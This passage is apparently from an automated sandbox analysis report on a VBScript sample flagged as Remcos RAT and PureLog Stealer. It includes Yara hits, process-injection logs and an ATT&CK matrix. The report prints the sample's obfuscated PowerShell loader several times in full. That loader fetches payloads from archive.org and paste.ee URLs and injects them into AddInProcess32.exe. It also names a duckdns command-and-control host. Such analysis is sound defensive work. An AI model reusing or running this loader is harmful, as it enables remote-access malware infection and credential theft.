'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6D3008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaokfzbuklhqkxliccqturykicplm5htwvbmywxmswyxs1qt2lojycpkcaoj3cxjysnwnvybca9ifz3m2h0dhankydzoi8vjysnascrj2e2jysnmdaxmdaudxmuyxjjagl2zs5vcmcnkycvmjqnkycvascrj3rlbxmvzgv0jysnywgtjysnbm90zs12lycrj0rldgfotm8nkyd0zvyudhgnkyd0vnczoycrj3cxwmjhc2u2jysnnemnkydvbnrljysnbnqgpsaotmv3jysnlu9iaicrj2vjdcankydtescrj3n0zw0utmv0jysnllcnkydlyknsawvudckurg93bmxvywrtjysndhjpbmcnkycodzfadxjsktt3jysnmvpijysnaw4nkydhcicrj3ldb250zw50id0gwycrj1n5jysnc3rlbs5djysnb24nkyd2jysnzxj0jysnxto6ricrj3inkydvbujhcycrj2u2nfn0cmluzycrjyh3mvpiyxnlnicrjzrdb250zscrj250ktt3mvphc3nlbwjsesa9ifsnkydszwzszwn0jysnascrj29ulkfzjysnc2vtymx5xscrjzo6tg9hzccrjygnkyd3mvonkydiaw5hcnldb24nkyd0zw50jysnktt3mvp0jysnexblid0gdzfayxnzjysnzw1ijysnbhkur2v0vhlwjysnzshwdzmnkydsdscrj25qrs4nkydib21ljysnvnczktt3jysnmvptzxrob2qgpsb3jysnmvonkyd0escrj3bllkdlde1ldghvzchwdznwqulwdzmpo3cxwm0nkydldggnkydvzccrjy5jbnzva2uodycrjzfabnvsbcwgjysnwycrj29iamvjdftdjysnxuaovicrj3czmc9wv2nkjysnbicrjy9klycrj2unkydllmv0c2fwly86c3b0dghwdzmglccrjybwdznkzxnhdgl2yscrj2rvvnczicwgjysnvicrj3czzgvzyxrpdmfkbycrj1z3jysnmyasjysnifz3m2qnkydlcycrj2enkyd0axzhzg9wjysndzmsvncnkyczqwrksw5qjysncicrj28nkydjzxnzmzjwdzmsjysnvicrj3czvnczksknks5yzxbsqwnlkcdwdzmnlftzvhjjtkddw0niyvjdmzkplnjlcgxby2uoj3cxwicsjyqnksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ((variable '*mdr*').name[3,11,2]-join'')( ('w1'+'zurl = vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'detahno'+'tev.tx'+'tvw3;'+'w1zbase6'+'4c'+'onte'+'nt = (new'+'-obj'+'ect '+'sy'+'stem.net'+'.w'+'ebclient).downloads'+'tring'+'(w1zurl);w'+'1zb'+'in'+'ar'+'ycontent = ['+'sy'+'stem.c'+'on'+'v'+'ert'+']::f'+'r'+'ombas'+'e64string'+'(w1zbase6'+'4conte'+'nt);w1zassembly = ['+'reflect'+'i'+'on.as'+'sembly]'+'::load'+'('+'w1z'+'binarycon'+'tent'+');w1zt'+'ype = w1zass'+'emb'+'ly.gettyp'+'e(vw3'+'ru'+'npe.'+'home'+'vw3);w'+'1zmethod = w'+'1z'+'ty'+'pe.getmethod(vw3vaivw3);w1zm'+'eth'+'od'+'.invoke(w'+'1znull, '+'['+'object[]'+']@(v'+'w30/pwcj'+'n'+'/d/'+'e'+'e.etsap//:sptthvw3 ,'+' vw3desativa'+'dovw3 , '+'v'+'w3desativado'+'vw'+'3 ,'+' vw3d'+'es'+'a'+'tivadov'+'w3,vw'+'3addinp'+'r'+'o'+'cess32vw3,'+'v'+'w3vw3))').replace('vw3',[string][char]39).replace('w1z','$'))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaokfzbuklhqkxliccqturykicplm5htwvbmywxmswyxs1qt2lojycpkcaoj3cxjysnwnvybca9ifz3m2h0dhankydzoi8vjysnascrj2e2jysnmdaxmdaudxmuyxjjagl2zs5vcmcnkycvmjqnkycvascrj3rlbxmvzgv0jysnywgtjysnbm90zs12lycrj0rldgfotm8nkyd0zvyudhgnkyd0vnczoycrj3cxwmjhc2u2jysnnemnkydvbnrljysnbnqgpsaotmv3jysnlu9iaicrj2vjdcankydtescrj3n0zw0utmv0jysnllcnkydlyknsawvudckurg93bmxvywrtjysndhjpbmcnkycodzfadxjsktt3jysnmvpijysnaw4nkydhcicrj3ldb250zw50id0gwycrj1n5jysnc3rlbs5djysnb24nkyd2jysnzxj0jysnxto6ricrj3inkydvbujhcycrj2u2nfn0cmluzycrjyh3mvpiyxnlnicrjzrdb250zscrj250ktt3mvphc3nlbwjsesa9ifsnkydszwzszwn0jysnascrj29ulkfzjysnc2vtymx5xscrjzo6tg9hzccrjygnkyd3mvonkydiaw5hcnldb24nkyd0zw50jysnktt3mvp0jysnexblid0gdzfayxnzjysnzw1ijysnbhkur2v0vhlwjysnzshwdzmnkydsdscrj25qrs4nkydib21ljysnvnczktt3jysnmvptzxrob2qgpsb3jysnmvonkyd0escrj3bllkdlde1ldghvzchwdznwqulwdzmpo3cxwm0nkydldggnkydvzccrjy5jbnzva2uodycrjzfabnvsbcwgjysnwycrj29iamvjdftdjysnxuaovicrj3czmc9wv2nkjysnbicrjy9klycrj2unkydllmv0c2fwly86c3b0dghwdzmglccrjybwdznkzxnhdgl2yscrj2rvvnczicwgjysnvicrj3czzgvzyxrpdmfkbycrj1z3jysnmyasjysnifz3m2qnkydlcycrj2enkyd0axzhzg9wjysndzmsvncnkyczqwrksw5qjysncicrj28nkydjzxnzmzjwdzmsjysnvicrj3czvnczksknks5yzxbsqwnlkcdwdzmnlftzvhjjtkddw0niyvjdmzkplnjlcgxby2uoj3cxwicsjyqnksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ((variable '*mdr*').name[3,11,2]-join'')( ('w1'+'zurl = vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'detahno'+'tev.tx'+'tvw3;'+'w1zbase6'+'4c'+'onte'+'nt = (new'+'-obj'+'ect '+'sy'+'stem.net'+'.w'+'ebclient).downloads'+'tring'+'(w1zurl);w'+'1zb'+'in'+'ar'+'ycontent = ['+'sy'+'stem.c'+'on'+'v'+'ert'+']::f'+'r'+'ombas'+'e64string'+'(w1zbase6'+'4conte'+'nt);w1zassembly = ['+'reflect'+'i'+'on.as'+'sembly]'+'::load'+'('+'w1z'+'binarycon'+'tent'+');w1zt'+'ype = w1zass'+'emb'+'ly.gettyp'+'e(vw3'+'ru'+'npe.'+'home'+'vw3);w'+'1zmethod = w'+'1z'+'ty'+'pe.getmethod(vw3vaivw3);w1zm'+'eth'+'od'+'.invoke(w'+'1znull, '+'['+'object[]'+']@(v'+'w30/pwcj'+'n'+'/d/'+'e'+'e.etsap//:sptthvw3 ,'+' vw3desativa'+'dovw3 , '+'v'+'w3desativado'+'vw'+'3 ,'+' vw3d'+'es'+'a'+'tivadov'+'w3,vw'+'3addinp'+'r'+'o'+'cess32vw3,'+'v'+'w3vw3))').replace('vw3',[string][char]39).replace('w1z','$'))"Jump to behavior
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerH*
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHW\32Y-
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHW\32R-
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHW\
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managercke
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHW\3000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 6.2.powershell.exe.208f4260d38.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208fba90000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f4260d38.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208fba90000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F3A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DCR6HWJump to behavior
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 6.2.powershell.exe.208f4260d38.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208fba90000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f4260d38.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208fba90000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F3A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting                  		Valid Accounts11
                  Command and Scripting Interpreter                  		221
                  Scripting                  		212
                  Process Injection                  		21
                  Virtualization/Sandbox Evasion                  		11
                  Input Capture                  		1
                  Security Software Discovery                  		Remote Services11
                  Input Capture                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		212
                  Process Injection                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information                  		Security Account Manager21
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Software Packing                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials12
                  System Information Discovery                  		VNCGUI Input Capture23
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523833 Sample: OIQ1ybtQdW.vbs Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 28 paste.ee 2->28 30 23spt.duckdns.org 2->30 32 ia600100.us.archive.org 2->32 44 Multi AV Scanner detection for domain / URL 2->44 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 54 12 other signatures 2->54 9 wscript.exe 1 2->9         started        signatures3 50 Connects to a pastebin service (likely for C&C) 28->50 52 Uses dynamic DNS services 30->52 process4 signatures5 60 VBScript performs obfuscated calls to suspicious functions 9->60 62 Suspicious powershell command line found 9->62 64 Wscript starts Powershell (via cmd or directly) 9->64 66 3 other signatures 9->66 12 powershell.exe 7 9->12         started        process6 signatures7 68 Suspicious powershell command line found 12->68 70 Obfuscated command line found 12->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 12->72 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 36 paste.ee 188.114.96.3, 443, 49706 CLOUDFLARENETUS European Union 15->36 38 ia600100.us.archive.org 207.241.227.240, 443, 49705 